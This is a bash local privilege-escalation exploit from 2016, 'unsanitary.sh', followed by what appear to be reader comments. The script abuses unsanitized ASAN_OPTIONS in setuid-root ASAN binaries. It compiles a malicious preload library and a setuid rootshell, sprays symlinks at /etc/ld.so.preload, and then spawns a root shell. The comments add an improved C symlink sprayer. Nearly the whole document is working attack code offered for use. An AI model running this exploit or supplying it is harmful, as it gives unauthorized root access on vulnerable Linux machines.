unsanitary.sh

#!/bin/bash
# unsanitary.sh - ASAN/SUID Local Root Exploit
# Exploits er, unsanitized env var passing in ASAN
# which leads to file clobbering as root when executing
# setuid root binaries compiled with ASAN.
# Uses an overwrite of /etc/ld.so.preload to get root on
# a vulnerable system. Supply your own target binary to
# use for exploitation.
# Implements the bug found here: http://seclists.org/oss-sec/2016/q1/363
# Video of Exploitation: https://www.youtube.com/watch?v=jhSIm3auQMk
# Released under the Snitches Get Stitches Public Licence.
# Gr33tz to everyone in #lizardhq and elsewhere <3
# ~infodox (18/02/2016)
# FREE LAURI LOVE!
echo "Unsanitary - ASAN/SUID Local Root Exploit ~infodox (2016)"
if [[ $# -eq 0 ]] ; then
    echo "use: $0 /full/path/to/targetbin"
    echo "where targetbin is setuid root and compiled w/ ASAN"
    exit 0
fi
echo "[+] First, we create our shell and library..."
cat << EOF > /tmp/libhax.c
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
__attribute__ ((__constructor__))
void dropshell(void){
    chown("/tmp/rootshell", 0, 0);
    chmod("/tmp/rootshell", 04755);
    unlink("/etc/ld.so.preload");
    printf("[+] done!\n");
}
EOF
gcc -fPIC -shared -ldl -o /tmp/libhax.so /tmp/libhax.c
rm -f /tmp/libhax.c
cat << EOF > /tmp/rootshell.c
#include <stdio.h>
int main(void){
    setuid(0);
    setgid(0);
    seteuid(0);
    setegid(0);
    execvp("/bin/sh", NULL, NULL);
}
EOF
gcc -o /tmp/rootshell /tmp/rootshell.c
rm -f /tmp/rootshell.c
echo "[+] Now we drop our python symlink spraying tool..."
cat << EOF > sym.py
#!/usr/bin/python
import os
curpid=os.getpid()
print curpid
for x in range(0,100):
    newpid=curpid+x
    boom = "foo.%s" %(str(newpid))
    os.symlink("/etc/ld.so.preload", boom)
EOF
echo "[+] Spraying dir with symlinks..."
python sym.py
echo "[+] Hack the planet!"
ASAN_OPTIONS='suppressions="/hacktheplanet
/tmp/libhax.so
hacktheplanet" log_path=./foo verbosity=1' $1 >/dev/null 2>&1
$1 >/dev/null 2>&1
echo "[+] Tidy up a bit..."
rm -f foo*
rm -f sym.py
rm -f /tmp/libhax.so
echo "[<3] :PPpPpPpOpr000000t!"
/tmp/rootshell

sym.py is not needed...
in bash $$ is equal to the pid of the current shells process
so with that, lines 49 through 60 can be simplified to something such as
echo $$
for i in {1..100}; do ln -s /etc/ld.so.preload "foo.$(($$+$i))";done

sym.py is not needed...
in bash $$ is equal to the pid of the current shells process
so with that, lines 49 through 60 can be simplified to something such as
echo $$
for i in {1..100}; do ln -s /etc/ld.so.preload "foo.$(($$+$i))";done

Unfortunately it's not that simple, as each invocation of ln will spawn a new process, offsetting the pid by 1.

I've written an updated version of 0x27's exploit here, which replaces the python code with a simple C implementation, removing the requirement for python to be installed.

Here's the relevant code:

spray="/tmp/.spray"

# ...

log_prefix="$(cat /dev/urandom | tr -dc 'a-z0-9' | fold -w 12 | head -n 1)___"
spray_size=100

# ...

echo "[.] Compiling ${spray}.c ..."

cat << EOF > "${spray}.c"
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
int main(void)
{
  pid_t pid = getpid();
  char buf[64];
  for (int i=0; i<=${spray_size}; i++) {
    snprintf(buf, sizeof(buf), "${log_prefix}.%ld", (long)pid+i);
    symlink("/etc/ld.so.preload", buf);
  }
}
EOF

if ! gcc "${spray}.c" -o "${spray}"; then
  echo "[-] Compiling ${spray}.c failed"
  exit 1
fi
/bin/rm -f "${spray}.c"

echo "[.] Spraying $(pwd) with symlinks ..."

/bin/rm $log_prefix* >/dev/null 2>&1
$spray